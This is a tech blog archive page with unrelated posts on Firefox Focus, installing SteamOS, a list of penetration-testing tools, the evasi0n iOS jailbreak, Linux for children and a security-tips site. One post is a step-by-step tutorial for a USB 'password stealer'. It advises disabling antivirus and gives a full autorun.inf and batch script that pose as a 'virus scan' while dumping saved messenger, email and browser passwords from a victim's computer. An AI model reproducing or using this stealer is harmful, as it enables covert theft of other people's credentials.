Archive for the ‘Apps’ Category

At the end of last year, Mozilla launched a privacy browser called Firefox Focus for the iOS platform, providing more comprehensive and professional protection for your Internet privacy, by default, including tracking, social and advertising tracking. And now, this privacy-oriented browser officially landed Android platform.

Download: Google Play and App Store

Compared to the regular mobile browser Firefox Focus in the function is a bit a single, only a search and URL bar, but also in the settings panel is also relatively “simple”, you can turn on/off different tracking type. This browser does not support tabs or other menus, and there is an erase button at the top of the app to clean up your online traces manually, and the app is automatically cleaned up after the application is closed.

Compared to the iOS version, Android version Firefox Focus added some additional features. Including an ad tracking count that allows the user to know how many sites each site has blocked, and to allow the user to manually turn off tracking blocking when the page is not loaded correctly, and when you run Firefox Focus in the background, Clean up the Internet history.

christmas TV
Now that the first Steam Machine prototypes have shipped out, Valve has released its Steam OS into the wild.

You can download Steam OS here, and it’s advisable that you carefully read the Steam OS FAQbefore diving in.

SteamOS is a fork (derivative) of Debian GNU/Linux. The first version (SteamOS 1.0) is called ‘alchemist’ and it is based on the Debian ‘wheezy’ (stable 7.1) distribution.

SteamOS is designed to run Steam and Steam games. It also provides a desktop mode which can run regular Linux applications.  SteamOS currently provides a limited set of packages, but many Debian wheezy packages work fine on SteamOS, says Valve.

Steam OS can only run Linux games, so your Windows-only library is out. However, Valve is working on a system which will allow Windows games to be streamed from your Windows machine to the your Steam OS machine.

SteamOS Hardware Requirements:

  • Intel or AMD 64-bit capable processor
  • 4GB or more memory
  • 500GB or larger disk
  • NVIDIA graphics card (AMD and Intel graphics support coming soon)
  • UEFI boot support
  • USB port for installation

 

How do I install SteamOS?

There are two different installation methods for SteamOS. The recommended method is the Default Installation method, which is a pre-configured image-based install using CloneZilla. The other method uses Debian Installer, which allows for customization after an automated install step. Please choose one of those methods below.

WARNING: Both installation methods will erase all content on the target computer

Default Installation

You will need to create a SteamOS System Restore USB stick to perform this install. The image provided here requires at least a 1TB disk.

Download the default SteamOS beta installation

Format a 4GB or larger USB stick with the FAT32 filesystem. Use “SYSRESTORE” as the partition name.

Unzip the contents of SYSRESTORE.zip to this USB stick to create the System Restore USB stick.

Put the System Restore USB stick in your target machine. Boot your machine and tell the BIOS to boot off the stick. (Usually something like F8, F11 or F12 will bring up the BIOS boot menu).

Make sure you select the UEFI entry, it may look something like “UEFI: Patriot Memory PMAP”. If there is no UEFI entry, you may need to enable UEFI support in your BIOS setup.

Select “Restore Entire Disk” from the GRUB menu.

When it is complete it will shutdown. Power on the machine to boot into your freshly re-imaged SteamOS.

Custom Installation

The second method is based on the Debian Installer. It requires multiple configuration steps:

Download the custom SteamOS beta installation

Unzip the SteamOS.zip file to a blank, FAT32-formatted USB stick.

Put the USB stick in your target machine. Boot your machine and tell the BIOS to boot off the stick. (Usually something like F8, F11, or F12 will bring up the BIOS boot menu).

Make sure you select the UEFI entry, it may look something like “UEFI: Patriot Memory PMAP”. If there is no UEFI entry, you may need to enable UEFI support in your BIOS setup.

Selected “Automated install” from the menu.

The rest of the installation is unattended and will repartition the drive and install SteamOS.

tv crime2

1. Nmap
Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap homepage.

2. Wireshark
Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. Wireshark homepage.

3. Metasploit Community edition
Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence. Metasploit community edition homepage.

4. Nikto2
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Nikto2 homepage.

5. John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version. John the Ripper homepage.

6. ettercap
Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. ettercap homepage.

7. NexPose Community edition
The Nexpose Community Edition is a free, single-user vulnerability management solution. Nexpose Community Edition is powered by the same scan engine as Nexpose Enterprise and offers many of the same features. Nexpose homepage.

8. Ncat
Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses. ncat homepage.

9. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. kismet homepage.

10. w3af
w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af homepage.

11. hping
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features. hping homepage.

12. burpsuite
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. BurpSuite homepage.

13. THC-Hydra
A very fast network logon cracker which support many different services.  hydra homepage.

14. sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. sqlmap homepage.

15. webscarab
WebScarab has a large amount of functionality, and as such can be quite intimidating to the new user. But, for the simplest case, intercepting and modifying requests and responses between a browser and HTTP/S server, there is not a lot that needs to be learned. WebScarab homepage.

tv crime2

It has been a long time since the news for an all-round jailbreak tool started to float around the community. Yes, you can now jailbreak your iDevice running iOS 6.1.

This jailbreak tool supports almost all iGadgets and allows an untethered jailbreak for any device that you can think of except for Apple TV 3.

The incredible and the most talented jailbreak gurus joined hands not too long ago to bring the most reliable jailbreak ever. The gurus namely Pimskeks, Planetbeing, Pod2g and MuscleNerd formed a team and called themselves the Evad3rs specifically for this project. The idea was to exploit Apple’s post-A5 chip devices in order to develop the jailbreak for iOS 6. It seems like they were very successful in doing so and have accomplished their goal with flying colours. The Evad3rs being to you Evasi0n to rock your iDevice and Apple Co.’s world!

The following devices are supported by this tool:

  • iPhone 5
  • iPhone 4S
  • iPhone 4evasi0n-iOS-66.1
  • iPhone 3GS
  • iPad 4
  • iPad 3
  • iPad 2
  • iPad mini
  • iPod touch 4
  • iPod touch 5

iOS firmware versions supported by Evasi0n:

  • iOS 6.0
  • iOS 6.0.1
  • iOS 6.0.2
  • iOS 6.1

We recommend our readers not to update their devices over the air and to instead use download links provided below or through iTunes. You can now enjoy iOS 6′s features with the added perks of jailbreak tweaks.

Download iOS 6.1 for your iDevice.
Download Evasi0n for Windows.
Download Evasi0n for Mac.
Download Evasi0n for Linux

Caintech.co.uk

This post is of-course for educational purposes only.

Although the title of this post implies that this is designed for a USB, any device like an MP3 player or a mobile phone can be used as they can all execute programs.

We know that windows stores most of its passwords on daily basis , such as MSN messenger passwords,Yahoo passwords,Facebook passwords etc. Most people hate to type passwords over and over again; so when that little tick box appears that asks to save/remember password the opportunity is jumped at, this shall be their undoing.

 

Things you will need?
Note: Before downloading the following apps you might want to disable your Anti Virus, as most of these will appear as a suspicious file.

MessenPass – MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby

Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for:

  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

IE Passview – IE passview is a small program that helps us view stored passwords in Internet Explorer.

Protected storage pass viewer(PSPV) –  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox – Password fox is a small program used to view Stored passwords in Mozilla Firefox

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

1.First of all download all 5 tools and copy the executable files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it.

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB

 

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
Save the Notepad file and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready, all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.

After this you can see saved password in .TXT files on the USB
Have fun and hack responsibly

 

Believe it or not, there are several distributions of Linux intended for use by children as young as 3 years old. Child-oriented Linux distros tend to have a simplified interface with large, “chunky”, colorful icons and a specialized set of programs designed with kids in mind. Some of the better-known distributions aimed at children include:

  • Sugar, the operating system designed for the One Laptop Per Child project. Sugar is a radical departure from traditional desktops, with a strong emphasis on teaching programming skills, but is very strongly geared towards classroom use. Although I’m pretty comfortable using Linux, I’m afraid Sugar might be too different for me to help my nephew and niece make use of it.
  • Edubuntu is based on the popular Ubuntu distribution. Designed to be easy to install and very Windows-like in its operation, Edubuntu would be my first choice if I were using newer hardware. With its rich graphical interface, though, I worry that these years-old PCs, neither of which have graphic cards, will lag running Edubuntu. And given kids’ attention spans, I’m afraid that would be a major barrier to getting them to use it.
  • LinuxKidX uses a KDE-based desktop highly customized for children, and is based on the Slackware distro. The only drawback for me is that most of the support material is in Portuguese (although the distro I linked to is in English), making it hard for me to be confident about my ability to help if there are any problems.
  • Foresight for Kids is based on Foresight Linux, a distro distinguished by the use of the Conary package manager. Conary is intended to make updates and dependencies much easier to manage than other package managers – in English, it should be easier to install and update software.  On the other hand, finding software packaged for the Conary installer might be a challenge, though I expect the most popular programs are being adapted by the Foresight team.
  • Qimo is another system based on Ubuntu, but designed to be used by a single home user instead of in classroom instruction. The system requirements are fairly low, since it’s designed to be run on donated equipment which Qimo’s parent organization, QuinnCo, distributes to needy kids.

Given the low specs of the equipment I”m working with, Qimo seems idea for me, but since most of these will run from either a Live CD or a USB memory key, there’s no reason not to download them all and give each a try to see what you – and, more importantly, your kids – like best.

Linux Software for Kids

In addition to the kid-friendly interface, all of the distributions above come with an assortment of software that’s either designed especially for kids or has special appeal for kids. This includes specifically educational software intended to teach math, typing, art, or even computer programming; typical productivity applications like word processors and graphics programs; and, of course, games. Of course, Linux doesn’t have nearly the range of games that are available for Windows PCs, but my thinking is, the games are good enough for younger kids, and older kids will gravitate towards consoles (my brother and sister-in-law have a Wii).

Some of the software available for kids includes:

  • GCompris, a set of over 100 educational games intended to teach everything from basic computer use to reading, art history, telling time, and vector drawing.
  • Childsplay is another collection of games, with an emphasis on memory skills.
  • TuxPaint, an amazing drawing program filled with fun sound effects and neat effects.
  • EToys is a scripting environment, more or less. The idea is that kids solve problems by breaking them down into pieces, scripting them, and running their scripts – the same way programmers do. But the goal doesn’t seem to be to teach programming but rather to provide an immersive learning environment in which kids learn foundational thinking skills.
  • SuperTux and Secret Maryo are Super Mario clones, because kids love Super Mario. You already know that.
  • TomBoy, a wiki-like note-taking program.
  • TuxTyping, a typing game intended to help develop basic typing skills.
  • Kalzium is a guide to the periodic table and a database of information about chemistry and the elements. Great for older students.
  • Atomix, a cool little game where kids build molecules out of atoms.
  • Tux of Math Command is an arcade game that helps develop math skills.

Not all distros come with all of these games, but they are easy enough to install from the online repositories if your chosen distro doesn’t come with one or more of them. Of course, most distros also come with standard Linux programs like OpenOffice.org (an Office-like suite of productivity apps), AbiWord (a Word-like word processor), GIMP (a powerful image editor), Pidgin (a multi-account IM client), and Firefox.

Linux is a complex operating system, but it’s also a highly customizable one – for kids, that means a system that can grow as they do and a powerful learning environment. Of course, children’s computer use should not be totally unsupervised – any kid can stumble across Web content that might be pretty uncomfortable for mom and dad to have to explain – but kids should have a chance to explore the possibilities of today’s technology and get their hands dirty, like kids do. And worst-case scenario – your 6-year old borks the operating system and you re-install. Wouldn’t you rather it was on the Edubuntu system, rather than on your mission-critical work PC? (Make sure you back up the /home directory regularly so you don’t lose all your kids’ drawings, poems, stories, or whatever.)

 

If I had a credit for every person that has come to me and told me that their machine is infected with something or their machine is doing strange things, I’d be a rich engineer by now.

Now wouldn’t it be great to have a website that you can reference for self education and removal tips. Well look no further Select Real Security is your one stop shop for all your security needs.

 ‘This website provides you with useful resources and information on computer security. It contains over 100 links to a variety of useful security related resources, including articles and guides on malware prevention, protection, tips, and more. It also contains information on how to secure your computer, data, and internet connection from malicious attacks.’
The site contains the following pages

Here is a section from the quick tips page, as you can see the advise is solid and reliable.

Quick Tips for Computer Security

There are several ways you can protect your computer and data from malicious attacks. Most of them can be done at no cost at all. Here are some simple tips that will help keep your computer and data safe.
                                                             
  1. Stay away from warez (pirated software), cracks, keygens, and programs from P2P.
  2. Install ALL of your Windows updates (e.g. software updates, security fixes, patches, service packs).
  3. Back up your important data regularly. How do I back up my data?
  4. Keep your system and software updated. How do I keep my software up-to-date?
  5. Use a good antivirus program. Best Free Antivirus Software
  6. Do not open email attachments from unknown sources or files sent through an instant messenger.
  7. Only download software from trusted sources (e.g. Filehippo, Softpedia, Cnet).
  8. Choose strong (complex) passwords. Passwords should be a minimum of eight characters and contain a combination of letters (uppercase/lowercase), numbers, and special symbols (!,@, #, &, %, *). 
  9. Disable unnecessary plug-ins in your web browser. This will help keep you safe from malicious scripts and activeX exploits.
  10. Use a secure DNS service such as OpenDNS or Google DNS. List of Free Secure DNS Services
  11. Do not believe every virus warning you receive; many are hoaxes and scareware. How To Identify and Avoid Antivirus Scams
  12. Remain as anonymous as possible. Do not give out your full name, address, phone number, or other personal information to anyone you do not know or who doesn’t have a legitimate need for it (in person, over the phone, via email, or the Internet).
  13. Turn off your computer when you are not using it. If the computer is on and connected, then it can be exposed to an attack.
  14. Replace programs that have a bad security track record (e.g. IE, Outlook, Adobe Reader).
Downloads:
Select Real Security also provides PDF downloads to help explain security in plain English (see below)
Brian from Select Real Security says

‘Many different symptoms indicate a malware infection. Sometimes, the symptoms can be difficult to detect. Below is a list of symptoms you may experience when your computer is infected with malware. Note that the first three symptoms can also be caused by hardware problems.’
  • Your computer shows strange error messages or popups.
  • Your computer takes longer to start and runs more slowly than usual.
  • Your computer freezes or crashes randomly.
  • The homepage of your Internet browser has changed.
  • Strange or unexpected toolbars appear in your Internet browser.
  • Your search results are being redirected (random websites).
  • You cannot access security related websites.
  • New icons and programs appear on the desktop that you did not put there.
  • Your desktop background has changed without your knowledge.
  • Your programs won’t start.
  • Your security protection has been disabled for no apparent reason.
  • You cannot connect to the internet or it runs very slowly.
  • Your programs and files are suddenly missing.
  • Your computer is performing actions on its own.

If you can say ‘YES’ to any of the above, take a trip over to Select Real Security and have a read of the vast material and resources contained in this site.

Follow Select Real Security on Twitter and Facebook